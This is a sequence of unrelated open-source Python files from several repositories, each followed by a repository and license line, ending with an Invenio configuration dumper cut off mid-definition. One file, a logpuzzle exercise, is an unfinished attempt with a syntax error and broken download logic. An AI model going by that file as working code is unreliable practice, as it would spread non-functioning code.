- SLURM : either BEGIN, END, FAIL, REQUEUE or ALL.
See the documenation for more information
log_directory : str, optional (default=None)
Specify the log directory. If None, no log directory is specified.
backend : {'sge', 'slurm'}, optional (default="slurm")
Backend where the job will be submitted
shell_script : str, optional (default="#!/bin/bash")
Specify shell that is used by the script.
Returns
-------
submission_query : str,
Return the submission query in the appropriate format.
The obtained query could be directly launch using os.subprocess.
Further options could be appended at the end of the string.
Examples
--------
First, let's generate a command for SLURM to launch the program
``main.py``.
>>> from clusterlib.scheduler import submit
>>> script = submit("python main.py --args 1")
>>> print(script)
echo '#!/bin/bash
python main.py --args 1' | sbatch --job-name=job --time=24:00:00 --mem=4000
The job can be latter launched using for instance ``os.system(script)``.
"""
if backend in _TEMPLATE:
launcher = _LAUNCHER[backend]
template = _TEMPLATE[backend]
else:
raise ValueError("Unknown backend %s expected any of %s"
% (backend, "{%s}" % ",".join(_TEMPLATE)))
job_options = [
template["job_name"] % job_name,
template["time"] % time,
template["memory"] % memory,
]
if email:
job_options.append(template["email"] % email)
if email_options:
job_options.append(template["email_options"] % email_options)
if log_directory:
if backend == "sge":
job_options.append(template["log_directory"] % log_directory)
elif backend == "slurm":
job_options.append(template["log_directory"]
% (log_directory, job_name))
# Using echo job_commands | launcher job_options allows to avoid creating
# a script file. The script is indeed created on the flight.
command = ("echo '%s\n%s' | %s %s"
% (shell_script, job_command, launcher, " ".join(job_options)))
return command
| lesteve/clusterlib | clusterlib/scheduler.py | Python | bsd-3-clause | 5,598 |
import logging
import pandasdmx
pandasdmx.logger.setLevel(logging.DEBUG)
| dr-leo/pandaSDMX | pandasdmx/tests/conftest.py | Python | apache-2.0 | 75 |
##
# Copyright 2015-2020 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for OCaml packages, implemented as an easyblock
@author: Kenneth Hoste (Ghent University)
"""
from easybuild.framework.extensioneasyblock import ExtensionEasyBlock
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.run import run_cmd
class OCamlPackage(ExtensionEasyBlock):
"""Builds and installs OCaml packages using OPAM package manager."""
def configure_step(self):
"""Raise error when configure step is run: installing OCaml packages stand-alone is not supported (yet)"""
raise EasyBuildError("Installing OCaml packages stand-alone is not supported (yet)")
def run(self):
"""Perform OCaml package installation (as extension)."""
# install using 'opam install'
run_cmd("eval `opam config env` && opam install -yv %s.%s" % (self.name, self.version))
# 'opam pin add' fixes the version of the package
# see https://opam.ocaml.org/doc/Usage.html#opampin
run_cmd("eval `opam config env` && opam pin -yv add %s %s" % (self.name, self.version))
| pescobar/easybuild-easyblocks | easybuild/easyblocks/generic/ocamlpackage.py | Python | gpl-2.0 | 2,118 |
# Copyright 2020 Camptocamp SA
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl)
{
"name": "Test Base Time Window",
"summary": "Test Base model to handle time windows",
"version": "14.0.1.0.1",
"category": "Technical Settings",
"author": "ACSONE SA/NV, Camptocamp, Odoo Community Association (OCA)",
"license": "AGPL-3",
"website": "https://github.com/OCA/server-tools",
"depends": ["base_time_window"],
"data": ["security/ir.model.access.xml"],
"installable": True,
}
| OCA/server-tools | test_base_time_window/__manifest__.py | Python | agpl-3.0 | 523 |
import unittest
import numpy
import chainer
from chainer import backend
from chainer.backends import cuda
from chainer import functions
from chainer import gradient_check
from chainer import testing
from chainer.testing import attr
import chainerx
@testing.parameterize(*testing.product_dict(
[
{'shape': (3, 4), 'axis': 0, 'y_shape': (2, 3, 4)},
{'shape': (3, 4), 'axis': 1, 'y_shape': (3, 2, 4)},
{'shape': (3, 4), 'axis': 2, 'y_shape': (3, 4, 2)},
{'shape': (3, 4), 'axis': -1, 'y_shape': (3, 4, 2)},
{'shape': (3, 4), 'axis': -2, 'y_shape': (3, 2, 4)},
{'shape': (3, 4), 'axis': -3, 'y_shape': (2, 3, 4)},
{'shape': (), 'axis': 0, 'y_shape': (2,)},
{'shape': (), 'axis': -1, 'y_shape': (2,)},
],
[
{'dtype': numpy.float16},
{'dtype': numpy.float32},
{'dtype': numpy.float64},
]
))
class TestStack(unittest.TestCase):
def setUp(self):
self.xs = [
numpy.random.uniform(-1, 1, self.shape).astype(self.dtype),
numpy.random.uniform(-1, 1, self.shape).astype(self.dtype),
]
self.g = numpy.random.uniform(-1, 1, self.y_shape).astype(self.dtype)
self.ggs = [
numpy.random.uniform(-1, 1, self.shape).astype(self.dtype),
numpy.random.uniform(-1, 1, self.shape).astype(self.dtype),
]
def check_forward(self, xs_data):
xs = [chainer.Variable(x) for x in xs_data]
y = functions.stack(xs, axis=self.axis)
if hasattr(numpy, 'stack'):
# run test only with numpy>=1.10
expect = numpy.stack(self.xs, axis=self.axis)
testing.assert_allclose(y.data, expect)
y_data = backend.CpuDevice().send(y.data)
self.assertEqual(y_data.shape[self.axis], 2)
numpy.testing.assert_array_equal(
y_data.take(0, axis=self.axis), self.xs[0])
numpy.testing.assert_array_equal(
y_data.take(1, axis=self.axis), self.xs[1])
def test_forward_cpu(self):
self.check_forward(self.xs)
@attr.gpu
def test_forward_gpu(self):
self.check_forward([cuda.to_gpu(x) for x in self.xs])
@attr.chainerx
def test_forward_chainerx(self):
self.check_forward([chainerx.array(x) for x in self.xs])
def check_backward(self, xs_data, g_data):
def func(*xs):
return functions.stack(xs, self.axis)
gradient_check.check_backward(
func, xs_data, g_data, eps=2.0 ** -2, dtype='d')
def test_backward_cpu(self):
self.check_backward(self.xs, self.g)
@attr.gpu
def test_backward_gpu(self):
self.check_backward(
[cuda.to_gpu(x) for x in self.xs], cuda.to_gpu(self.g))
@attr.chainerx
def test_backward_chainerx(self):
self.check_backward(
[chainerx.array(x) for x in self.xs], chainerx.array(self.g))
def check_double_backward(self, xs_data, g_data, ggs_data):
def func(*xs):
return functions.stack(xs, self.axis)
gradient_check.check_double_backward(
func, xs_data, g_data, ggs_data, dtype=numpy.float64)
def test_double_backward_cpu(self):
self.check_double_backward(self.xs, self.g, self.ggs)
@attr.gpu
def test_double_backward_gpu(self):
self.check_double_backward(
cuda.to_gpu(self.xs), cuda.to_gpu(self.g), cuda.to_gpu(self.ggs))
@attr.chainerx
def test_double_backward_chainerx(self):
self.check_double_backward(
backend.to_chx(self.xs),
backend.to_chx(self.g),
backend.to_chx(self.ggs))
testing.run_module(__name__, __file__)
| okuta/chainer | tests/chainer_tests/functions_tests/array_tests/test_stack.py | Python | mit | 3,692 |
# -*- coding: utf-8 -*-
from django.contrib.postgres import fields
from django.contrib.auth.models import Group
from api.taxonomies.utils import optimize_subject_query
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from dirtyfields import DirtyFieldsMixin
from api.preprint_providers.permissions import GroupHelper, PERMISSIONS, GROUP_FORMAT, GROUPS
from osf.models.base import BaseModel, ObjectIDMixin
from osf.models.licenses import NodeLicense
from osf.models.mixins import ReviewProviderMixin
from osf.models.subject import Subject
from osf.utils.datetime_aware_jsonfield import DateTimeAwareJSONField
from osf.utils.fields import EncryptedTextField
from website import settings
from website.util import api_v2_url
class PreprintProvider(ObjectIDMixin, ReviewProviderMixin, DirtyFieldsMixin, BaseModel):
PUSH_SHARE_TYPE_CHOICES = (('Preprint', 'Preprint'),
('Thesis', 'Thesis'),)
PUSH_SHARE_TYPE_HELP = 'This SHARE type will be used when pushing publications to SHARE'
REVIEWABLE_RELATION_NAME = 'preprint_services'
name = models.CharField(null=False, max_length=128) # max length on prod: 22
description = models.TextField(default='', blank=True)
domain = models.URLField(blank=True, default='', max_length=200)
domain_redirect_enabled = models.BooleanField(default=False)
external_url = models.URLField(null=True, blank=True, max_length=200) # max length on prod: 25
email_contact = models.CharField(null=True, blank=True, max_length=200) # max length on prod: 23
email_support = models.CharField(null=True, blank=True, max_length=200) # max length on prod: 23
example = models.CharField(null=True, blank=True, max_length=20) # max length on prod: 5
access_token = EncryptedTextField(null=True, blank=True)
advisory_board = models.TextField(default='', blank=True)
social_twitter = models.CharField(null=True, blank=True, max_length=200) # max length on prod: 8
social_facebook = models.CharField(null=True, blank=True, max_length=200) # max length on prod: 8
social_instagram = models.CharField(null=True, blank=True, max_length=200) # max length on prod: 8
footer_links = models.TextField(default='', blank=True)
share_publish_type = models.CharField(choices=PUSH_SHARE_TYPE_CHOICES,
default='Preprint',
help_text=PUSH_SHARE_TYPE_HELP,
max_length=32)
share_source = models.CharField(blank=True, max_length=200)
share_title = models.TextField(default='', blank=True)
allow_submissions = models.BooleanField(default=True)
additional_providers = fields.ArrayField(models.CharField(max_length=200), default=list, blank=True)
facebook_app_id = models.BigIntegerField(blank=True, null=True)
PREPRINT_WORD_CHOICES = (
('preprint', 'Preprint'),
('paper', 'Paper'),
('thesis', 'Thesis'),
('none', 'None')
)
preprint_word = models.CharField(max_length=10, choices=PREPRINT_WORD_CHOICES, default='preprint')
subjects_acceptable = DateTimeAwareJSONField(blank=True, default=list)
licenses_acceptable = models.ManyToManyField(NodeLicense, blank=True, related_name='licenses_acceptable')
default_license = models.ForeignKey(NodeLicense, related_name='default_license',
null=True, blank=True, on_delete=models.CASCADE)
class Meta:
permissions = tuple(PERMISSIONS.items()) + (
# custom permissions for use in the OSF Admin App
('view_preprintprovider', 'Can view preprint provider details'),
)
def __unicode__(self):
return '{} with id {}'.format(self.name, self.id)
@property
def has_highlighted_subjects(self):
return self.subjects.filter(highlighted=True).exists()
@property
def highlighted_subjects(self):
if self.has_highlighted_subjects:
return self.subjects.filter(highlighted=True).order_by('text')[:10]
else:
return sorted(self.top_level_subjects, key=lambda s: s.text)[:10]
@property
def top_level_subjects(self):
if self.subjects.exists():
return optimize_subject_query(self.subjects.filter(parent__isnull=True))
else:
# TODO: Delet this when all PreprintProviders have a mapping
if len(self.subjects_acceptable) == 0:
return optimize_subject_query(Subject.objects.filter(parent__isnull=True, provider___id='osf'))
tops = set([sub[0][0] for sub in self.subjects_acceptable])
return [Subject.load(sub) for sub in tops]
@property
def all_subjects(self):
if self.subjects.exists():
return self.subjects.all()
else:
# TODO: Delet this when all PreprintProviders have a mapping
return rules_to_subjects(self.subjects_acceptable)
@property
def landing_url(self):
return self.domain if self.domain else '{}preprints/{}'.format(settings.DOMAIN, self.name.lower())
def get_absolute_url(self):
return '{}preprint_providers/{}'.format(self.absolute_api_v2_url, self._id)
@property
def absolute_api_v2_url(self):
path = '/preprint_providers/{}/'.format(self._id)
return api_v2_url(path)
def save(self, *args, **kwargs):
dirty_fields = self.get_dirty_fields()
old_id = dirty_fields.get('_id', None)
if old_id:
for permission_type in GROUPS.keys():
Group.objects.filter(
name=GROUP_FORMAT.format(provider_id=old_id, group=permission_type)
).update(
name=GROUP_FORMAT.format(provider_id=self._id, group=permission_type)
)
return super(PreprintProvider, self).save(*args, **kwargs)
def rules_to_subjects(rules):
if not rules:
return Subject.objects.filter(provider___id='osf')
q = []
for rule in rules:
parent_from_rule = Subject.load(rule[0][-1])
if rule[1]:
q.append(models.Q(parent=parent_from_rule))
if len(rule[0]) == 1:
potential_parents = Subject.objects.filter(parent=parent_from_rule)
for parent in potential_parents:
q.append(models.Q(parent=parent))
for sub in rule[0]:
q.append(models.Q(_id=sub))
return Subject.objects.filter(reduce(lambda x, y: x | y, q)) if len(q) > 1 else (Subject.objects.filter(q[0]) if len(q) else Subject.objects.all())
@receiver(post_save, sender=PreprintProvider)
def create_provider_auth_groups(sender, instance, created, **kwargs):
if created:
GroupHelper(instance).update_provider_auth_groups()
| chennan47/osf.io | osf/models/preprint_provider.py | Python | apache-2.0 | 6,881 |
from uuid import uuid4
import os
import platform
import signal
import time
import traceback
import webbrowser
from couchpotato.api import addApiView
from couchpotato.core.event import fireEvent, addEvent
from couchpotato.core.helpers.variable import cleanHost, md5
from couchpotato.core.logger import CPLog
from couchpotato.core.plugins.base import Plugin
from couchpotato.environment import Env
from tornado.ioloop import IOLoop
log = CPLog(__name__)
autoload = 'Core'
class Core(Plugin):
ignore_restart = [
'Core.restart', 'Core.shutdown',
'Updater.check', 'Updater.autoUpdate',
]
shutdown_started = False
def __init__(self):
addApiView('app.shutdown', self.shutdown, docs = {
'desc': 'Shutdown the app.',
'return': {'type': 'string: shutdown'}
})
addApiView('app.restart', self.restart, docs = {
'desc': 'Restart the app.',
'return': {'type': 'string: restart'}
})
addApiView('app.available', self.available, docs = {
'desc': 'Check if app available.'
})
addApiView('app.version', self.versionView, docs = {
'desc': 'Get version.'
})
addEvent('app.shutdown', self.shutdown)
addEvent('app.restart', self.restart)
addEvent('app.load', self.launchBrowser, priority = 1)
addEvent('app.base_url', self.createBaseUrl)
addEvent('app.api_url', self.createApiUrl)
addEvent('app.version', self.version)
addEvent('app.load', self.checkDataDir)
addEvent('app.load', self.cleanUpFolders)
addEvent('setting.save.core.password', self.md5Password)
addEvent('setting.save.core.api_key', self.checkApikey)
# Make sure we can close-down with ctrl+c properly
if not Env.get('desktop'):
self.signalHandler()
# Set default urlopen timeout
import socket
socket.setdefaulttimeout(30)
def md5Password(self, value):
return md5(value) if value else ''
def checkApikey(self, value):
return value if value and len(value) > 3 else uuid4().hex
def checkDataDir(self):
if Env.get('app_dir') in Env.get('data_dir'):
log.error('You should NOT use your CouchPotato directory to save your settings in. Files will get overwritten or be deleted.')
return True
def cleanUpFolders(self):
self.deleteEmptyFolder(Env.get('app_dir'), show_error = False)
def available(self, **kwargs):
return {
'success': True
}
def shutdown(self, **kwargs):
if self.shutdown_started:
return False
def shutdown():
self.initShutdown()
if IOLoop.current()._closing:
shutdown()
else:
IOLoop.current().add_callback(shutdown)
return 'shutdown'
def restart(self, **kwargs):
if self.shutdown_started:
return False
def restart():
self.initShutdown(restart = True)
IOLoop.current().add_callback(restart)
return 'restarting'
def initShutdown(self, restart = False):
if self.shutdown_started:
log.info('Already shutting down')
return
log.info('Shutting down' if not restart else 'Restarting')
self.shutdown_started = True
fireEvent('app.do_shutdown')
log.debug('Every plugin got shutdown event')
loop = True
starttime = time.time()
while loop:
log.debug('Asking who is running')
still_running = fireEvent('plugin.running', merge = True)
log.debug('Still running: %s', still_running)
if len(still_running) == 0:
break
elif starttime < time.time() - 30: # Always force break after 30s wait
break
running = list(set(still_running) - set(self.ignore_restart))
if len(running) > 0:
log.info('Waiting on plugins to finish: %s', running)
else:
loop = False
time.sleep(1)
log.debug('Safe to shutdown/restart')
try:
if not IOLoop.current()._closing:
IOLoop.current().stop()
except RuntimeError:
pass
except:
log.error('Failed shutting down the server: %s', traceback.format_exc())
fireEvent('app.after_shutdown', restart = restart)
def launchBrowser(self):
if Env.setting('launch_browser'):
log.info('Launching browser')
url = self.createBaseUrl()
try:
webbrowser.open(url, 2, 1)
except:
try:
webbrowser.open(url, 1, 1)
except:
log.error('Could not launch a browser.')
def createBaseUrl(self):
host = Env.setting('host')
if host == '0.0.0.0' or host == '':
host = 'localhost'
port = Env.setting('port')
return '%s:%d%s' % (cleanHost(host).rstrip('/'), int(port), Env.get('web_base'))
def createApiUrl(self):
return '%sapi/%s' % (self.createBaseUrl(), Env.setting('api_key'))
def version(self):
ver = fireEvent('updater.info', single = True)
if os.name == 'nt': platf = 'windows'
elif 'Darwin' in platform.platform(): platf = 'osx'
else: platf = 'linux'
return '%s - %s-%s - v2' % (platf, ver.get('version')['type'], ver.get('version')['hash'])
def versionView(self, **kwargs):
return {
'version': self.version()
}
def signalHandler(self):
if Env.get('daemonized'): return
def signal_handler(*args, **kwargs):
fireEvent('app.shutdown', single = True)
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
config = [{
'name': 'core',
'order': 1,
'groups': [
{
'tab': 'general',
'name': 'basics',
'description': 'Needs restart before changes take effect.',
'wizard': True,
'options': [
{
'name': 'username',
'default': '',
},
{
'name': 'password',
'default': '',
'type': 'password',
},
{
'name': 'port',
'default': 5050,
'type': 'int',
'description': 'The port I should listen to.',
},
{
'name': 'ssl_cert',
'description': 'Path to SSL server.crt',
'advanced': True,
},
{
'name': 'ssl_key',
'description': 'Path to SSL server.key',
'advanced': True,
},
{
'name': 'launch_browser',
'default': True,
'type': 'bool',
'description': 'Launch the browser when I start.',
'wizard': True,
},
],
},
{
'tab': 'general',
'name': 'advanced',
'description': "For those who know what they're doing",
'advanced': True,
'options': [
{
'name': 'api_key',
'default': uuid4().hex,
'readonly': 1,
'description': 'Let 3rd party app do stuff. <a target="_self" href="../../docs/">Docs</a>',
},
{
'name': 'debug',
'default': 0,
'type': 'bool',
'description': 'Enable debugging.',
},
{
'name': 'development',
'default': 0,
'type': 'bool',
'description': 'Enable this if you\'re developing, and NOT in any other case, thanks.',
},
{
'name': 'data_dir',
'type': 'directory',
'description': 'Where cache/logs/etc are stored. Keep empty for defaults.',
},
{
'name': 'url_base',
'default': '',
'description': 'When using mod_proxy use this to append the url with this.',
},
{
'name': 'permission_folder',
'default': '0755',
'label': 'Folder CHMOD',
'description': 'Can be either decimal (493) or octal (leading zero: 0755)',
},
{
'name': 'permission_file',
'default': '0755',
'label': 'File CHMOD',
'description': 'Same as Folder CHMOD but for files',
},
],
},
],
}]
| Aristocles/CouchPotatoServer | couchpotato/core/_base/_core.py | Python | gpl-3.0 | 9,215 |
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import numpy
import pandas
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.utils.validation import check_is_fitted
from ._clinical_kernel import continuous_ordinal_kernel, continuous_ordinal_kernel_with_ranges, \
pairwise_continuous_ordinal_kernel, pairwise_nominal_kernel
__all__ = ['clinical_kernel', 'ClinicalKernelTransform']
def _nominal_kernel(x, y, out):
"""Number of features that match exactly"""
for i in range(x.shape[0]):
for j in range(y.shape[0]):
out[i, j] += (x[i, :] == y[j, :]).sum()
return out
def _get_continuous_and_ordinal_array(x):
"""Convert array from continuous and ordered categorical columns"""
nominal_columns = x.select_dtypes(include=['object', 'category']).columns
ordinal_columns = pandas.Index([v for v in nominal_columns if x[v].cat.ordered])
continuous_columns = x.select_dtypes(include=[numpy.number]).columns
x_num = x.loc[:, continuous_columns].astype(numpy.float64).values
if len(ordinal_columns) > 0:
x = _ordinal_as_numeric(x, ordinal_columns)
nominal_columns = nominal_columns.difference(ordinal_columns)
x_out = numpy.column_stack((x_num, x))
else:
x_out = x_num
return x_out, nominal_columns
def _ordinal_as_numeric(x, ordinal_columns):
x_numeric = numpy.empty((x.shape[0], len(ordinal_columns)), dtype=numpy.float64)
for i, c in enumerate(ordinal_columns):
x_numeric[:, i] = x[c].cat.codes
return x_numeric
def clinical_kernel(x, y=None):
"""Computes clinical kernel
The clinical kernel distinguishes between continuous
ordinal,and nominal variables.
Parameters
----------
x : pandas.DataFrame, shape = [n_samples_x, n_features]
Training data
y : pandas.DataFrame, shape = [n_samples_y, n_features]
Testing data
Returns
-------
kernel : array, shape = [n_samples_x, n_samples_y]
Kernel matrix. Values are normalized to lie within [0, 1].
References
----------
.. [1] Daemen, A., De Moor, B.,
"Development of a kernel function for clinical data".
Annual International Conference of the IEEE Engineering in Medicine and Biology Society, 5913-7, 2009
"""
if y is not None:
if x.shape[1] != y.shape[1]:
raise ValueError('x and y have different number of features')
if not x.columns.equals(y.columns):
raise ValueError('columns do not match')
else:
y = x
mat = numpy.zeros((x.shape[0], y.shape[0]), dtype=float)
x_numeric, nominal_columns = _get_continuous_and_ordinal_array(x)
if id(x) != id(y):
y_numeric, _ = _get_continuous_and_ordinal_array(y)
else:
y_numeric = x_numeric
continuous_ordinal_kernel(x_numeric, y_numeric, mat)
_nominal_kernel(x.loc[:, nominal_columns].values,
y.loc[:, nominal_columns].values,
mat)
mat /= x.shape[1]
return mat
class ClinicalKernelTransform(BaseEstimator, TransformerMixin):
"""Transform data using a clinical Kernel
The clinical kernel distinguishes between continuous
ordinal,and nominal variables.
Parameters
----------
fit_once : bool, optional
If set to ``True``, fit() does only transform the training data, but not update
its internal state. You should call prepare() once before calling transform().
If set to ``False``, it behaves like a regular estimator, i.e., you need to
call fit() before transform().
References
----------
.. [1] Daemen, A., De Moor, B.,
"Development of a kernel function for clinical data".
Annual International Conference of the IEEE Engineering in Medicine and Biology Society, 5913-7, 2009
"""
def __init__(self, fit_once=False, _numeric_ranges=None, _numeric_columns=None, _nominal_columns=None):
self.fit_once = fit_once
self._numeric_ranges = _numeric_ranges
self._numeric_columns = _numeric_columns
self._nominal_columns = _nominal_columns
def prepare(self, X):
"""Determine transformation parameters from data in X.
Use if `fit_once` is `True`, in which case `fit()` does
not set the parameters of the clinical kernel.
Parameters
----------
X: pandas.DataFrame, shape = [n_samples, n_features]
Data to estimate parameters from.
"""
if not self.fit_once:
raise ValueError('prepare can only be used if fit_once parameter is set to True')
self._prepare_by_column_dtype(X)
def _prepare_by_column_dtype(self, X):
"""Get distance functions for each column's dtype"""
if not isinstance(X, pandas.DataFrame):
raise TypeError('X must be a pandas DataFrame')
numeric_columns = []
nominal_columns = []
numeric_ranges = []
fit_data = numpy.empty_like(X)
for i, dt in enumerate(X.dtypes):
col = X.iloc[:, i]
if pandas.core.common.is_categorical_dtype(dt):
if col.cat.ordered:
numeric_ranges.append(col.cat.codes.max() - col.cat.codes.min())
numeric_columns.append(i)
else:
nominal_columns.append(i)
col = col.cat.codes
elif pandas.core.common.is_numeric_dtype(dt):
numeric_ranges.append(col.max() - col.min())
numeric_columns.append(i)
else:
raise TypeError('unsupported dtype: %r' % dt)
fit_data[:, i] = col.values
self._numeric_columns = numpy.asarray(numeric_columns)
self._nominal_columns = numpy.asarray(nominal_columns)
self._numeric_ranges = numpy.asarray(numeric_ranges, dtype=float)
self.X_fit_ = fit_data
def fit(self, X, y=None, **kwargs):
"""Determine transformation parameters from data in X.
Subsequent calls to `transform(Y)` compute the pairwise
distance to `X`.
Parameters of the clinical kernel are only updated
if `fit_once` is `False`, otherwise you have to
explicitly call `prepare()` once.
Parameters
----------
X: pandas.DataFrame, shape = [n_samples, n_features]
Data to estimate parameters from.
Returns
-------
self : object
Returns the instance itself.
"""
if X.ndim != 2:
raise ValueError("expected 2d array, but got %d" % X.ndim)
if self.fit_once:
self.X_fit_ = X
else:
self._prepare_by_column_dtype(X)
return self
def transform(self, Y):
"""Compute all pairwise distances between `self.X_fit_` and `Y`.
Parameters
----------
y : array-like, shape = [n_samples_y, n_features]
Returns
-------
kernel : array, shape = [n_samples_y, n_samples_X_fit\_]
Kernel matrix. Values are normalized to lie within [0, 1].
"""
check_is_fitted(self, 'X_fit_')
n_samples_x, n_features = self.X_fit_.shape
Y = numpy.asarray(Y)
if Y.shape[1] != n_features:
raise ValueError('expected array with %d features, but got %d' % (n_features, Y.shape[1]))
n_samples_y = Y.shape[0]
mat = numpy.zeros((n_samples_y, n_samples_x), dtype=float)
continuous_ordinal_kernel_with_ranges(Y[:, self._numeric_columns].astype(numpy.float64),
self.X_fit_[:, self._numeric_columns].astype(numpy.float64),
self._numeric_ranges, mat)
if len(self._nominal_columns) > 0:
_nominal_kernel(Y[:, self._nominal_columns],
self.X_fit_[:, self._nominal_columns],
mat)
mat /= n_features
return mat
def __call__(self, X, Y):
"""Compute Kernel matrix between `X` and `Y`.
Parameters
----------
x : array-like, shape = [n_samples_x, n_features]
Training data
y : array-like, shape = [n_samples_y, n_features]
Testing data
Returns
-------
kernel : array, shape = [n_samples_x, n_samples_y]
Kernel matrix. Values are normalized to lie within [0, 1].
"""
return self.fit(X).transform(Y).T
def pairwise_kernel(self, X, Y):
"""Function to use with :func:`sklearn.metrics.pairwise.pairwise_kernels`
Parameters
----------
X : array, shape = [n_features]
Y : array, shape = [n_features]
Returns
-------
similarity : float
Similarities are normalized to be within [0, 1]
"""
check_is_fitted(self, 'X_fit_')
if X.shape[0] != Y.shape[0]:
raise ValueError('X and Y have different number of features')
val = pairwise_continuous_ordinal_kernel(X[self._numeric_columns], Y[self._numeric_columns],
self._numeric_ranges)
if len(self._nominal_columns) > 0:
val += pairwise_nominal_kernel(X[self._nominal_columns].astype(numpy.int8),
Y[self._nominal_columns].astype(numpy.int8))
val /= X.shape[0]
return val
| tum-camp/survival-support-vector-machine | survival/kernels/clinical.py | Python | gpl-3.0 | 10,110 |
#!/usr/bin/python
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
import os
import re
import sys
import urllib2
"""Logpuzzle exercise
Given an apache logfile, find the puzzle urls and download the images.
Here's what a puzzle url looks like:
10.254.254.28 - - [06/Aug/2007:00:13:48 -0700] "GET /~foo/puzzle-bar-aaab.jpg HTTP/1.0" 302 528 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
"""
def read_urls(filename):
"""Returns a list of the puzzle urls from the given log file,
extracting the hostname from the filename itself.
Screens out duplicate urls and returns the urls sorted into
increasing order."""
def extract_key(url):
return re.search(r".*-([a-zA-Z]+\.jpg)", url).group(1)
def create_url(matchObj):
path, resource = matchObj.group(1, 2)
return path + resource
result = []
with open(filename) as f:
logs = f.read().split("\n")
for log in logs:
match = re.search(r"GET (.*/[^/]+/)([\w-]+\.jpg)", log)
if match:
url = create_url(match)
if url not in result:
result.append(url)
result.sort(key=extract_key)
return result
def download_images(img_urls, dest_dir):
"""Given the urls already in the correct order, downloads
each image into the given directory.
Gives the images local filenames img0, img1, and so on.
Creates an index.html in the directory
with an img tag to show each local image file.
Creates the directory if necessary.
"""
count = 0
if not os.access(dest_dir, "F_OK"):
os.makedirs(dest_dir)
os.chdir(dest_dir)
for url in img_urls:
image_binary = urllib2.urlopen(url)
with open("img%02d.jpg" % count, "w") as img:
img.write(image_binary)
count += 1
with open("index.html", "w") as index:
index.write("<!DOCTYPE html>\n<html>\n\t<head>\n\t\t<title>Puzzle Images</title>\n\t</head>\n\t<body>\n\t\t<h1>Puzzle Images</h1>\n")
for url in img_urls:
image = urllib2.urlopen(url)
with open("img%02d.jpg" % count
print image
def main():
args = sys.argv[1:]
if not args:
print 'usage: [--todir dir] logfile '
sys.exit(1)
todir = ''
if args[0] == '--todir':
todir = args[1]
del args[0:2]
img_urls = read_urls(args[0])
if todir:
download_images(img_urls, todir)
else:
print '\n'.join(img_urls)
if __name__ == '__main__':
main()
| brebory/google-python-exercises | logpuzzle/logpuzzle.py | Python | apache-2.0 | 2,488 |
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
*** HIGHLY EXPERIMENTAL; PLEASE DO NOT USE. ***
Invenio configuration dumper and loader CLI tool.
Usage: python inveniocfg_dumperloader.py [options]
General options:
-h, --help print this help
-V, --version print version number
Dumper options:
-d file dump the collections into a INI file
-col COLLECTION1,COLLECTION2... collection/s to dump
-all dump all the collections
--force-ids also dump the ids of the tables to the file
--output print the file in the screen
Loader options:
-l file load a file into the database
-mode i|c|r select the mode to load(insert, correct, replace)
"""
__revision__ = "$Id$"
import sys
import random
import re
import datetime
import StringIO
from string import Template
from invenio.dbquery import run_sql, wash_table_column_name
from configobj import ConfigObj
IDENT_TYPE = " " #Identation in the *.INI file can be a tab/spaces/etc...
MESSAGES = [] #List of messages to display to the user at the end of the execution
LOAD_DEFAULT_MODE = 'i'
SEPARATOR = '.'
#Dict of blacklisted fields and the message to display
BLACKLIST_TABLE_COLUMNS = {
'collection.reclist': '#INFO Please rerun webcoll.',
'accROLE.firefole_def_ser': '#INFO Please rerun webaccessadmin -c.',
'score':'#INFO Run whatever relevant',
'tag.value':'#INFO Please run inveniocfg --do-something',
'field_tag.score':'#INFO please run inveniocfg --fill-scores'
}
COLLECTIONS = {
'FIELD' : {
'tables':{
'field':'extend(field.id=fieldname.id_field,fieldname.$ln.$type = $value)',
'field_tag':'field_tag.id_field = field.id, field_tag.id_tag = tag.id',
'tag':'normal'},
'relations':'field-field_tag-tag',
},
'COLLECTION' : {
'tables':{
'collection':'normal',
'collection_example':'collection_example.id_example = example.id, collection_example.id_collection = collection.id',
'example':'normal'},
'relations':'collection-collection_example-example',
},
'PORTALBOX' : {
'tables':{
'collection':'normal',
